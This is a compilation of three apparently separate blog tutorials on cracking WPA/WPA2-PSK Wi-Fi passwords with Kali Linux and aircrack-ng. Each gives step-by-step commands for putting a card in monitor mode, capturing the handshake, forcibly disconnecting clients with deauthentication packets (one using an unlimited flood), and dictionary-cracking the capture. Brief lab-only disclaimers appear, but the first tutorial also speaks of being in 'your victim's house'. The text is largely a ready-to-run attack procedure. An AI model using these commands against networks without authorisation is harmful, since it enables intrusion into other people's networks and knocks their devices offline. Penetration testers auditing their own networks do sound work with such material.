How To Hack WPA/WPA2 Wi-Fi With Kali Linux &

Aircrack-ng

Written by Lewis Encarnacion

Kali Linux can be used for many things, but it probably is best known for its ability
to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows
applications that claim they can hack WPA; don’t get them! They’re just scams, used by
professional hackers, to lure newbie or wannabe hackers into getting hacked themselves.
There is only one way that hackers get into your network, and that is with a Linux-based
OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that,
even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic
knowledge of how WPA authentication works, and moderate familiarity with Kali Linux
and its tools. If you feel you have the necessary skills, let’s begin:

These are things that you’ll need:

 A successful install of Kali Linux (which you probably have already done). If not,
follow my tutorial here: http://lewiscomputerhowto.blogspot.com/complete-guide-on-how-
to-install-kali.html
 A wireless adapter capable of injection/monitor mode. Some computers have
network cards capable of this from the factory. If you’re, like most however, you’ll have to
buy an external one. Here is a list of the best: http://blackmoreops.com/recommended-
usb-wireless-cards-kali-linux
 A wordlist to attempt to “crack” the password once it has been captured
 Time and patients

If you have these then roll up your sleeves and let’s see how secure your network is!

Important notice: Hacking into anyone’s Wi-Fi without permission is considered an

illegal act or crime in most countries. We are performing this tutorial for the sake of
penetration testing, hacking to become more secure, and are using our own test network
and router.

By reading and/or using the information below, you are agreeing to

our Disclaimer
Step One:

Start Kali Linux and login, preferably as root.

Step Two:

Plugin your injection-capable wireless adapter, (Unless your native computer wireless
card supports it). If you’re using Kali in VMware, then you might have to connect the card

via the icon in the device menu.

Step Three:

Disconnect from all wireless networks, open a Terminal, and type airmon-ng

This will list all of the wireless cards that support monitor (not injection) mode. If no cards
are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check
that it supports monitor mode. If you’re not using an external adapter, and you still don’t
see anything listed, then your card doesn’t support monitor mode, and you’ll have to
purchase an external one (see the link in the requirements). You can see here that my
card supports monitor mode and that it’s listed as wlan0.
Step Four:

Type airmon-ng start followed by the interface name of your wireless card. mine
is wlan0, so my command would be: airmon-ng start wlan0

The “(monitor mode enabled)” message means that the card has successfully been put
into monitor mode. Note the name of the new monitor interface, mon0.

EDIT:
A bug recently discovered in Kali Linux makes airmon-ng set the channel as a fixed “-1”
when you first enable mon0. If you receive this error, or simply do not want to take the
chance, follow these steps after enabling mon0:

Type: ifconfig [interface of wireless card] down and hit Enter.

Replace [interface of wireless card] with the name of the interface that you enabled
mon0 on; probably called wlan0. This disables the wireless card from connecting to the
internet, allowing it to focus on monitor mode instead.
After you have disabled mon0 (completed the wireless section of the tutorial), you’ll need
to enable wlan0 (or name of wireless interface), by typing: ifconfig [interface of
wireless card] up and pressing Enter.

Step Five:

Type airodump-ng followed by the name of the new monitor interface, which is
probably mon0.
If you receive a “fixed channel –1” error, see the Edit above.

Step Six:

Airodump will now list all of the wireless networks in your area, and a lot of useful
information about them. Locate your network or the network that you have permission to
penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl +
Con your keyboard to stop the process. Note the channel of your target network.

Step Seven Copy the BSSID of the target network

Now type this command:
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network. Paste the network BSSID
where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled
interface, (mon0). The “–w” and file path command specifies a place where airodump
will save any intercepted 4-way handshakes (necessary to crack the password). Here
we saved it to the Desktop, but you can save it anywhere.

A complete command should look similar this:

airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

Now press enter.

Step Eight:

Airodump with now monitor only the target network, allowing us to capture more specific
information about it. What we’re really doing now is waiting for a device to connect or
reconnect to the network, forcing the router to send out the four-way handshake that we
need to capture in order to crack the password.
Also, four files should show up on your desktop, this is where the handshake will be saved
when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient
hackers do. We’re actually going to use another cool-tool that belongs to the aircrack
suite called aireplay-ng, to speed up the process. Instead of waiting for a device to
connect, hackers can use this tool to force a device to reconnect by sending
deauthentication (deauth) packets to one of the networks devices, making it think that it
has to reconnect with the network.

Of course, in order for this tool to work, there has to be someone else connected to the
network first, so watch the airodump-ng and wait for a client to show up. It might take a
long time, or it might only take a second before the first one shows. If none show up after
a lengthy wait, then the network might be empty right now, or you’re to far away from the
network.

You can see in this picture, that a client has appeared on our network, allowing us to start
the next step.
Step Nine:

Leave airodump-ng running and open a second terminal. In this terminal, type this
command:
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to
send.
-a indicates the access point/router’s BSSID, replace [router bssid] with the BSSID of
the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the client’s BSSID, the device we’re trying to deauth, noted in the previous
picture. Replace the [client bssid] with the BSSID of the connected client, this will be
listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.

My complete command looks like this:

aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Step Ten:

Upon hitting Enter, you’ll see aireplay-ng send the packets. If you were close enough to
the target client, and the deauthentication process works, this message will appear on
the airodump screen (which you left open):
This means that the handshake has been captured, the password is in the hacker’s
hands, in some form or another. You can close the aireplay-ng terminal and hit Ctrl +
C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just
incase you need some of the information later.

If you didn’t receive the “handshake message,” then something went wrong in the process
of sending the packets. Unfortunately, a variety of things can go wrong. You might just be
too far away, and all you need to do is move closer. The device you’re attempting to
deauth might not be set to automatically reconnect, in which case you’ll either have to try
another device, or leave airodump on indefinitely until someone or something connects
to the network. If you’re very close to the network, you could try a WiFi spoofing tool like
wifi-honey, to try to fool the device into thinking that you’re the router. However, keep in
mind that this requires that you be significantly closer to the device than the router itself.
So unless you happen to be in your victim’s house, this is not recommended.

Do note that, despite your best efforts, there are many WPA networks that simply can’t
be cracked by these tools. The network could be empty, or the password could be 64
characters long, etc.

Step 11:

This concludes the external part of this tutorial. From now on, the process is entirely
between your computer, and those four files on your Desktop. Actually, it’s the .cap one,
that is important. Open a new Terminal, and type in this command:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is
00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have
downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password. The * means
wild card in Linux, and since I’m assuming that there are no other .cap files on your
Desktop, this should work fine the way it is.
My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt /root/Desktop/*.cap

Now press Enter.

Step 12:

Aircrack-ng will now launch into the process of cracking the password. However, it will
only crack it if the password happens to be in the wordlist that you’ve selected.
Sometimes, it’s not. If this is the case, you can try other wordlists. If you simply cannot
find the password no matter how many wordlists you try, then it appears your penetration
test has failed, and the network is at least safe from basic brute-force attacks.

Cracking the password might take a long time depending on the size of the wordlist. Mine
went very quickly.

If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

The passphrase to our test-network was “notsecure,” and you can see here that it was in
the wordlist, and aircrack found it.
Cracking WPA2 wifi password using aircrack-ng Kali linux 2

Cracking WPA2 wifi password is not really an easy thing to do,

no you can't crack it with a click and there is no software that will give you the password without some

hard work ...

don't run away still you can crack it with few steps here :) and we will do it using aircrack-ng

requirements: To crack a wpa2-psk encrypted wifi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed

a- if you don't have aircrack-ng suite get it by this commend in terminal

sudo apt-get install aircrack-ng

2- a wireless network adapter that support monitor mode like

a- Alfa 2W AWUS036NH

b- Alfa AWUS036H

c- wifiy-city 56G

d- and you can check this page here for card compatibility compatibility drivers

3- a word list comprising of all the possible different combination of pass-phrases

Now let's get to work

i will be using wifiy-city 56G card on Kali linux 2 sana

1) open up your terminal as root and type

ifconfig

this will show you all the networking interfaces connected to your device.

if your wireless network adapter is working fine you should see the " wlan0 " the name may change if

you have more then one connected wireless adapter.

2) now to start monitor mode type

airmon-ng start wlan0

'airmon-ng' is a traffic monitoring tool

‘wlan0’ is your wireless interface

after this commend we started the monitor mode

as it's seen the monitor mode is working under wlan0mon , so this is your card name for now

in the red area a list of process id’s that cause trouble during the process so kill those processes by

typing

kill <pid>

in my case

kill 743 898 1070 1071 1081

now type ifconfig and this will show the newly set monitoring interface i.e, wlan0mon . in most case it

will be mon0 .
3) to show list of available WiFi network type

airodump-ng wlan0mon

airodump-ng is a wifi packets capturing tool

wlan0mon is my monitoring interface

airodump-ng will start capturing all packets and from the captured packets

select your target and note its ‘bssid’ (bssid = base service set identifier) and channel

then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network

type the following command

airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon

i.e: airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon

this will start the capturing of packets.

and if you get the handshake you wont need the aireplay command...

if you don't get the handshake yet

while the capturing of packets goes on, open a new terminal as root and type

aireplay-ng -0 0 -a <bssid> mon0

aireplay-ng = tool for deauthentication, fake authentication and other packet injections,

-0 = number associated for deauthentication,

0 = deauth count,

-a = bssid) here we are trying to send a deauthentication request.

In my case the command looks like

aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

after few seconds stop it using cntrl+c.

now after we have successful captured the wpa handshake

5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and

files.

Select the file with “.cap“extension and type the following command

aircrack-ng -w <full location of the word list> <name of the file>

aircrack-ng is a tool that helps in cracking the password

In my case the command looks like

aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap

For the Wordlist Check this Post Best Password dictionary

Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found ( your key is here ;) ).

all Step in few lines

1) airodump-ng wlan0mon

2) airodump-ng -c 9 -w wifi --bssid C4:6E:1F:F6:34:B8 wlan0mon

3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon

4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

have a great day :)

 BREAKING WPA2-PSK WITH KALI LINUX

BY AAMIR LAKHANI / KALI / 21 FEB 2016

WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most
common attacks is against WPA2 is exploiting a weak passphrase.

Below you will find a few easy steps on how to break WPA2 with a weak passphrase.

Breaking the Wireless Lab Home Network:

I set up a test network for this blog article. The client box is logging into my Wireless Lab test network. This is
the network we will break.

Step 1:
The first step is to verify the router configuration. Normally in a real penetration test we would not have this
option, but since this is a home lab I have a little more flexibility.

In this case the lab access point is securing the wireless network Wireless Lab with WPA2-PSK. It using the
passphrase Cisco123. You can use any wireless router to setup your wireless lab.
 Step 2:
We will be using Kali Linux to complete this task. Kali will need a wireless card configured before it can be
used by the operating system. I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter
will work. I am a big fan of the AWUS051NH adapter because it a duel band adapter. However, this card is
very difficult to obtain since it is no longer sold.

.
The iwconfig command will show any wireless cards in the system. I am using a RealTek wireless card. Linux
ships with the RealTek drivers, making it a Linux plug and play wireless card.
The operating system recognizes a wireless interface named wlan0.

Step 3:
My next step will be to enable the wireless interface. This is accomplished issuing the ifconfig wlan0
up command.

Step 4:
I need to understand what wireless networks my wireless card sees. I issue the iwlist wlan0
scanning command.
This command forces the wireless card to scan and report on all wireless networks in the vicinity.

You can see from this example it found my target network: Wireless Lab. It also found the MAC address of my
access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific
access point (to ensure we are not attacking or breaking anyone else’s password).
Secondly, we see the AP is transmitting on channel 36.This is important because it allows us to be specific on
what wireless channel we will want our wireless card to monitor and capture traffic from.

Step 5:
The next step is to change the wireless card to monitoring mode. This will allow the wireless card to examine
all the packets in the air.
We do this by creating a monitor interface using airmon-ng. Issue the airmon-ng command to verify airmon-
ng sees your wireless card. From that point create the monitor interface by issuing the command: airmon-ng
start wlan0
Next, run the ifconfig command to verify the monitor interface is created. We can see mon0 is created.

Now verify the interface mon0 has been created.

Step 6:
Use airodump-ng to capture the WPA2 handshake. The attacker will have to catch someone in the act of
authenticating to get a valid capture. Airodump-ng will display a valid handshake when it captures it. It will
display the handshake confirmation in the upper right hand corner of the screen.
Note: We will manually connect to the wireless network to force a handshake. In a future post I will show you
how to force a reauthorization to make a device automatically disconnect and reconnect without any manual
intervention.
We used the following command: airodump-ng mon0 – -bssid 20:aa:4b:1f:b0:10 (to capture packets from
our AP) – –channel 6 (to limit channel hopping) – –write BreakingWPA2 (the name of the file we will save
to)
airodump-ng mon0 – -bssid 0E:18:1A:36:D6:22 – –channel 36 – –write BreakingWPA2

(make sure there is no space between “- -“)

To capture the handshake you are dependent on monitoring a legitimate client authenticate to the network.
However, it does not mean you have to wait for a client to legitimately authenticate. You can force a client to
re-authenticate (which will happen automatically with most clients when you force a deauthorization).

When you see the WPA Handshake Command you know you have captured an valid handshake

example:

Step 7:
We will use aircrack-ng with the dictionary file to crack the password. Your chances of breaking the
password are dependent on the password file.
The command on is: aircrack-ng “name of cap file you created” -w “name of your dictionary file”

The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2
handshake airodump captured is stored in the BreakingWPA2-01.cap file.
Backtrack 5 ships with a basic dictionary. The dictionary file darkc0de.lst is a popular worldlist that ships with
BackTrack5. We added our password Cisco123 in this file to make the test run a little smoother
Many attackers use large dictionaries that increase their chances of cracking a passwords. Many dictionaries
contain passwords from real users and websites that have been cracked and posted on the Internet. Some
sophisticated dictionaries combine multiple languages, permutations of each word, and key words and phrases
from social media sites such as Twitter and Facebook.
Kali does not come with the darkc0de.lst but you can download it from here
NOTE: Kali does have built-in worldlists in: /usr/share/worldlist
In this blog we created a file named “sample.lst” and added the word Cisco123 in it.

Success:
If the password is found in the dictionary file then Aircrack-ng will crack it.